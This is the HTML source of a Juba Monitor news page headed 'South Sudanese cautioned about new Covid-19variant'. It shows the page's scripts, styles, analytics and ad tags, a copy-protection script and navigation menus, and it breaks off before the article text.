<!DOCTYPE html>
<html lang="en-US">
<head>
	<meta charset="UTF-8"/>
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="profile" href="https://gmpg.org/xfn/11"/>
	<link rel="pingback" href="https://www.jubamonitor.com/xmlrpc.php"/>
	<style type='text/css'>/*
Welcome to the Special Recent Posts Custom CSS editor!
Please add all your custom CSS here and avoid modifying the core plugin files, since that'll make upgrading the plugin problematic. Your custom CSS will be loaded in your <head> section of your wordpress theme, which means that your rules will take precedence. Just add your CSS here for what you want to change, you don't need to copy all the plugin's stylesheet content.
*/</style><title>South Sudanese cautioned about new Covid-19variant &#8211; Juba Monitor</title>
<script type="application/javascript">var bingo_ruby_ajax_url = "https://www.jubamonitor.com/wp-admin/admin-ajax.php"</script><link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Juba Monitor &raquo; Feed" href="https://www.jubamonitor.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Juba Monitor &raquo; Comments Feed" href="https://www.jubamonitor.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.jubamonitor.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.9"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='srp-layout-stylesheet-css'  href='https://www.jubamonitor.com/wp-content/plugins/special-recent-posts/css/layout.css?ver=5.1.9' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_plugin_style-css'  href='https://www.jubamonitor.com/wp-content/plugins/bingo-ruby-core/assets/style.css?ver=1.6' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='https://www.jubamonitor.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.9' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='https://www.jubamonitor.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.4' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/bootstrap.css?ver=v3.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/font-awesome.css?ver=v4.7.0' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_miscellaneous-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/miscellaneous.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_main-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/css/theme-style.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_responsive-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/css/theme-responsive.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_default-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/style.css?ver=2.4' type='text/css' media='all' />
<style id='bingo_ruby_style_default-inline-css' type='text/css'>
.total-caption { font-family :Lato;}.banner-background-color { background-color: #ffffff; }.footer-copyright-wrap p { color: #dddddd; }.footer-copyright-wrap { background-color: #242424; }.post-excerpt{ font-size :14px;}
</style>
<link rel='stylesheet' id='frp-frontend-css'  href='https://www.jubamonitor.com/wp-content/plugins/flexible-recent-posts/css/frp-front.css?ver=5.1.9' type='text/css' media='all' />
<link rel='stylesheet' id='redux-google-fonts-bingo_ruby_theme_options-css'  href='https://fonts.googleapis.com/css?family=Lato%3A100%2C300%2C400%2C700%2C900%2C100italic%2C300italic%2C400italic%2C700italic%2C900italic%7CMontserrat%3A700%2C400%2C600%2C500&#038;ver=1613491069' type='text/css' media='all' />
<link rel='stylesheet' id='rps-style-css'  href='https://www.jubamonitor.com/wp-content/plugins/recent-posts-slider/css/style.css?ver=5.1.9' type='text/css' media='all' />
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/table-creator/public/assets/js/datatables.min.js?ver=1.0.0'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/html5.min.js?ver=3.7.3'></script>
<![endif]-->
<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-153871760-5' async></script>
<script type='text/javascript'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-153871760-5', {"anonymize_ip":true} );
</script>
<link rel='https://api.w.org/' href='https://www.jubamonitor.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.jubamonitor.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.jubamonitor.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Involvewomenin social decision making' href='https://www.jubamonitor.com/involvewomenin-social-decision-making/' />
<link rel='next' title='POLICE-In hot pursuit of Juba-Yei road killer gang' href='https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/' />
<meta name="generator" content="WordPress 5.1.9" />
<link rel="canonical" href="https://www.jubamonitor.com/south-sudanese-cautioned-about-new-covid-19variant/" />
<link rel='shortlink' href='https://www.jubamonitor.com/?p=44090' />
<link rel="alternate" type="application/json+oembed" href="https://www.jubamonitor.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.jubamonitor.com%2Fsouth-sudanese-cautioned-about-new-covid-19variant%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.jubamonitor.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.jubamonitor.com%2Fsouth-sudanese-cautioned-about-new-covid-19variant%2F&#038;format=xml" />
<meta name="generator" content="Site Kit by Google 1.8.1" /><style type="text/css" media="screen"></style><script id="wpcp_disable_selection" type="text/javascript">
//<![CDATA[
var image_save_msg='You Can Not Save images!';
	var no_menu_msg='Context Menu disabled!';
	var smessage = "Content is protected !!";

function disableEnterKey(e)
{
	if (e.ctrlKey){
     var key;
     if(window.event)
          key = window.event.keyCode;     //IE
     else
          key = e.which;     //firefox (97)
    //if (key != 17) alert(key);
     if (key == 97 || key == 65 || key == 67 || key == 99 || key == 88 || key == 120 || key == 26 || key == 85  || key == 86 || key == 83 || key == 43)
     {
          show_wpcp_message('You are not allowed to copy content or view source');
          return false;
     }else
     	return true;
     }
}

function disable_copy(e)
{	
	var elemtype = e.target.nodeName;
	var isSafari = /Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor);
	elemtype = elemtype.toUpperCase();
	var checker_IMG = '';
	if (elemtype == "IMG" && checker_IMG == 'checked' && e.detail >= 2) {show_wpcp_message(alertMsg_IMG);return false;}
	if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED")
	{
		if (smessage !== "" && e.detail == 2)
			show_wpcp_message(smessage);
		
		if (isSafari)
			return true;
		else
			return false;
	}	
}
function disable_copy_ie()
{
	var elemtype = window.event.srcElement.nodeName;
	elemtype = elemtype.toUpperCase();
	if (elemtype == "IMG") {show_wpcp_message(alertMsg_IMG);return false;}
	if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED")
	{
		//alert(navigator.userAgent.indexOf('MSIE'));
			//if (smessage !== "") show_wpcp_message(smessage);
		return false;
	}
}	
function reEnable()
{
	return true;
}
document.onkeydown = disableEnterKey;
document.onselectstart = disable_copy_ie;
if(navigator.userAgent.indexOf('MSIE')==-1)
{
	document.onmousedown = disable_copy;
	document.onclick = reEnable;
}
function disableSelection(target)
{
    //For IE This code will work
    if (typeof target.onselectstart!="undefined")
    target.onselectstart = disable_copy_ie;
    
    //For Firefox This code will work
    else if (typeof target.style.MozUserSelect!="undefined")
    {target.style.MozUserSelect="none";}
    
    //All other  (ie: Opera) This code will work
    else
    target.onmousedown=function(){return false}
    target.style.cursor = "default";
}
//Calling the JS function directly just after body load
window.onload = function(){disableSelection(document.body);};
//]]>
</script>
	<script id="wpcp_disable_Right_Click" type="text/javascript">
	//<![CDATA[
	document.ondragstart = function() { return false;}
	/* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	Disable context menu on images by GreenLava Version 1.0
	^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ */
	    function nocontext(e) {
	       return false;
	    }
	    document.oncontextmenu = nocontext;
	//]]>
	</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script>
(adsbygoogle = window.adsbygoogle || []).push({
google_ad_client: "ca-pub-2465781200142527",
enable_page_level_ads: true,
tag_partner: "site_kit"
});
</script>
		<meta property="og:title" content="South Sudanese cautioned about new Covid-19variant"/><meta property="og:type" content="article"/><meta property="og:url" content="https://www.jubamonitor.com/south-sudanese-cautioned-about-new-covid-19variant/"/><meta property="og:site_name" content="Juba Monitor"/><meta property="og:description" content="&lt;!-- wp:paragraph --&gt; By Martin Manyiel Wugol &lt;!-- /wp:paragraph --&gt; &lt;!-- wp:paragraph --&gt; Community in Uganda celebrated the Labour Day in form of celebrating the achievement of South Sudanese who"/><meta property="og:image" content="https://www.jubamonitor.com/wp-content/uploads/2021/05/Bishop-Peter-MarialAgok.jpg"/><link rel="icon" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1-50x50.jpg" sizes="32x32" />
<link rel="icon" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" />
<meta name="msapplication-TileImage" content="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" />
<style type="text/css" title="dynamic-css" class="options-output">.footer-inner{background-color:#282828;background-repeat:no-repeat;background-size:cover;background-attachment:fixed;background-position:center center;}.topbar-wrap{font-family:Lato;text-transform:capitalize;font-weight:400;font-style:normal;font-size:13px;}.main-menu-inner,.off-canvas-nav-inner{font-family:Lato;text-transform:uppercase;letter-spacing:0px;font-weight:700;font-style:normal;font-size:15px;}.main-menu-inner .sub-menu,.off-canvas-nav-inner .sub-menu{font-family:Lato;text-transform:capitalize;letter-spacing:0px;font-weight:400;font-style:normal;font-size:14px;}.logo-wrap.is-logo-text .logo-text h1{font-family:Montserrat;text-transform:uppercase;letter-spacing:-1px;font-weight:700;font-style:normal;font-size:40px;}.logo-mobile-text span{font-family:Montserrat;text-transform:uppercase;letter-spacing:-1px;font-weight:700;font-style:normal;font-size:28px;}body, p{font-family:Lato;line-height:24px;font-weight:400;font-style:normal;color:#282828;font-size:15px;}.post-title.is-size-1{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:36px;}.post-title.is-size-2{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:30px;}.post-title.is-size-3{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:21px;}.post-title.is-size-4{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:18px;}.post-title.is-size-5{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:14px;}.post-title.is-size-6{font-family:Montserrat;font-weight:400;font-style:normal;color:#282828;font-size:13px;}h1,h2,h3,h4,h5,h6{font-family:Montserrat;text-transform:none;font-weight:700;font-style:normal;}.post-meta-info,.single-post-top,.counter-element{font-family:Lato;font-weight:400;font-style:normal;color:#999;font-size:12px;}.post-cat-info{font-family:Lato;text-transform:uppercase;font-weight:700;font-style:normal;font-size:11px;}.block-header-wrap{font-family:Montserrat;text-transform:uppercase;font-weight:600;font-style:normal;font-size:18px;}.block-ajax-filter-wrap{font-family:Montserrat;text-transform:uppercase;font-weight:500;font-style:normal;font-size:11px;}.widget-title{font-family:Montserrat;text-transform:uppercase;font-weight:600;font-style:normal;font-size:14px;}.breadcrumb-wrap{font-family:Lato;text-transform:none;font-weight:400;font-style:normal;color:#777777;font-size:12px;}</style></head>
<body data-rsssl=1 class="post-template-default single single-post postid-44090 single-format-standard unselectable ruby-body is-full-width is-navbar-sticky is-smart-sticky"  itemscope  itemtype="https://schema.org/WebPage" >
<div class="off-canvas-wrap is-dark-text">
	<div class="off-canvas-inner">
		<a href="#" id="ruby-off-canvas-close-btn"><i class="ruby-close-btn" aria-hidden="true"></i></a>
		<nav id="ruby-offcanvas-navigation" class="off-canvas-nav-wrap">
			<div class="menu-big-menu-container"><ul id="offcanvas-nav" class="off-canvas-nav-inner"><li id="menu-item-9598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li>
<li id="menu-item-9582" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23"><a href="https://www.jubamonitor.com/category/news-2/">News</a>
<ul class="sub-menu">
	<li id="menu-item-9583" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9583 is-category-2"><a href="https://www.jubamonitor.com/category/news/">National News</a></li>
</ul>
</li>
<li id="menu-item-9584" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a>
<ul class="sub-menu">
	<li id="menu-item-9585" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9585 is-category-18"><a href="https://www.jubamonitor.com/category/opinion/editorial/">Editorial</a></li>
	<li id="menu-item-40975" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40975 is-category-60"><a href="https://www.jubamonitor.com/category/a-foot-for-thought/">A foot for thought</a></li>
	<li id="menu-item-9592" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9592 is-category-15"><a href="https://www.jubamonitor.com/category/opinion/columnists/">Columnists</a></li>
	<li id="menu-item-9593" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9593 is-category-16"><a href="https://www.jubamonitor.com/category/opinion/columnists/lets-speak-out/">Let&#8217;s Speak Out</a></li>
</ul>
</li>
<li id="menu-item-9586" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li>
<li id="menu-item-9587" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10"><a href="https://www.jubamonitor.com/category/sports/">Sports</a></li>
<li id="menu-item-9589" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li>
<li id="menu-item-11765" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li>
<li id="menu-item-9590" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li>
<li id="menu-item-9588" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a></li>
</ul></div>		</nav>
												<div class="off-canvas-social-wrap">
					<a class="icon-facebook icon-social" title="facebook" href="https://web.facebook.com/TheJubaMonitor/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a><a class="icon-twitter icon-social" title="twitter" href="https://twitter.com/JubaMonitor" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a>				</div>
										<div class="off-canvas-widget-section-wrap canvas-sidebar-wrap">
				<div class="canvas-sidebar-inner">
									</div>
			</div>
			</div>
</div><div id="ruby-site" class="site-outer">
	<div class="header-wrap header-style-1">
	<div class="header-inner">
		<div class="topbar-wrap topbar-style-1 is-light-text">
	<div class="ruby-container">
		<div class="topbar-inner container-inner clearfix">
			<div class="topbar-left">
				<div class="topbar-info">
			     <span class="info-email"><i class="fa fa-envelope" aria-hidden="true"></i><span>jubamonitor@yahoo.com</span></span>
     </div>				
<div class="topbar-date">
	<span>Monday, May 3rd, 2021</span>
</div>							</div>
			<div class="topbar-right">
				
	<div class="topbar-social social-tooltips">
		<a class="icon-facebook icon-social" title="facebook" href="https://web.facebook.com/TheJubaMonitor/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a><a class="icon-twitter icon-social" title="twitter" href="https://twitter.com/JubaMonitor" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a>	</div>
                							</div>
		</div>
	</div>
</div>

		<div class="banner-wrap banner-background-color">
			
			<div class="ruby-container">
				<div class="banner-inner container-inner clearfix">
					<div class="logo-wrap is-logo-image"  itemscope  itemtype="https://schema.org/Organization" >
	<div class="logo-inner">
							<a href="https://www.jubamonitor.com/" class="logo" title="Juba Monitor">
				<img data-no-retina src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg" height="" width=""  alt="Juba Monitor">
			</a>
						</div><!--#logo inner-->
    </div>
					
	<div class="banner-ad-wrap">
		<div class="banner-ad-inner">
                                                <div class="banner-ad-image">
                        <img src="https://www.jubamonitor.com/wp-content/uploads/2019/01/jubamonitor-ads-2.jpg" alt="Juba Monitor">
                    </div>
                            		</div>
	</div>
				</div>
			</div>
		</div>

		<div class="navbar-outer clearfix">
			<div class="navbar-wrap">
				<div class="ruby-container">
					<div class="navbar-inner container-inner clearfix">
						<div class="navbar-left">
							<div class="off-canvas-btn-wrap">
	<div class="off-canvas-btn">
		<a href="#" class="ruby-trigger" title="off canvas button">
			<span class="icon-wrap"></span>
		</a>
	</div>
</div>							<div class="logo-mobile-wrap is-logo-mobile-image"  itemscope  itemtype="https://schema.org/Organization" >
	<div class="logo-mobile-inner">
        <a href="https://www.jubamonitor.com/" class="logo" title="Juba Monitor">
            <img height="" width="" src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorMOBILELOGO.jpg" alt="Juba Monitor">
        </a>
	</div>
</div>
							<nav id="ruby-main-menu" class="main-menu-wrap"  itemscope  itemtype="https://schema.org/SiteNavigationElement" >
	<div class="menu-big-menu-container"><ul id="main-nav" class="main-menu-inner"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/news-2/">News</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><ul class="sub-menu is-sub-default">	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9583 is-category-2" data-mega_sub_filter="2" ><a href="https://www.jubamonitor.com/category/news/">National News</a></li></ul><div id="ruby_mega_9582" class="ruby-block-wrap block-mega-menu block-mega-menu-sub is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9582 data-block_name= bingo_ruby_mega_block_cat_sub data-posts_per_page= 4 data-block_page_max= 1112 data-block_page_current= 1 data-category_id= 23 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/" title="POLICE-In hot pursuit of Juba-Yei road killer gang" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="510" height="362" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok.jpg 510w, https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok-300x213.jpg 300w" sizes="(max-width: 510px) 100vw, 510px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/" rel="bookmark" title="POLICE-In hot pursuit of Juba-Yei road killer gang">POLICE-In hot pursuit of Juba-Yei road killer gang</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/south-sudanese-cautioned-about-new-covid-19variant/" title="South Sudanese cautioned about new Covid-19variant" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="335" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Bishop-Peter-MarialAgok-540x335.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/south-sudanese-cautioned-about-new-covid-19variant/" rel="bookmark" title="South Sudanese cautioned about new Covid-19variant">South Sudanese cautioned about new Covid-19variant</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/involvewomenin-social-decision-making/" title="Involvewomenin social decision making" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="459" height="291" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Some-of-the-young-girls-during-sensitization-training-in-Juba.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/05/Some-of-the-young-girls-during-sensitization-training-in-Juba.jpg 459w, https://www.jubamonitor.com/wp-content/uploads/2021/05/Some-of-the-young-girls-during-sensitization-training-in-Juba-300x190.jpg 300w" sizes="(max-width: 459px) 100vw, 459px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/involvewomenin-social-decision-making/" rel="bookmark" title="Involvewomenin social decision making">Involvewomenin social decision making</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/airline-denies-benefiting-from-oil-money-illegally/" title="Airline denies benefiting from oil money illegally" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="510" height="369" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Duang-Ayii-the-Chief-Executive-Officer-for-South-Supreme-Airlines.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/05/Duang-Ayii-the-Chief-Executive-Officer-for-South-Supreme-Airlines.jpg 510w, https://www.jubamonitor.com/wp-content/uploads/2021/05/Duang-Ayii-the-Chief-Executive-Officer-for-South-Supreme-Airlines-300x217.jpg 300w" sizes="(max-width: 510px) 100vw, 510px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/airline-denies-benefiting-from-oil-money-illegally/" rel="bookmark" title="Airline denies benefiting from oil money illegally">Airline denies benefiting from oil money illegally</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><ul class="sub-menu is-sub-default">	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9585 is-category-18" data-mega_sub_filter="18" ><a href="https://www.jubamonitor.com/category/opinion/editorial/">Editorial</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40975 is-category-60" data-mega_sub_filter="60" ><a href="https://www.jubamonitor.com/category/a-foot-for-thought/">A foot for thought</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9592 is-category-15" data-mega_sub_filter="15" ><a href="https://www.jubamonitor.com/category/opinion/columnists/">Columnists</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9593 is-category-16" data-mega_sub_filter="16" ><a href="https://www.jubamonitor.com/category/opinion/columnists/lets-speak-out/">Let&#8217;s Speak Out</a></li></ul><div id="ruby_mega_9584" class="ruby-block-wrap block-mega-menu block-mega-menu-sub is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9584 data-block_name= bingo_ruby_mega_block_cat_sub data-posts_per_page= 4 data-block_page_max= 645 data-block_page_current= 1 data-category_id= 5 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/the-rise-of-digital-marketing-in-juba/" rel="bookmark" title="The rise of digital marketing in Juba">The rise of digital marketing in Juba</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a 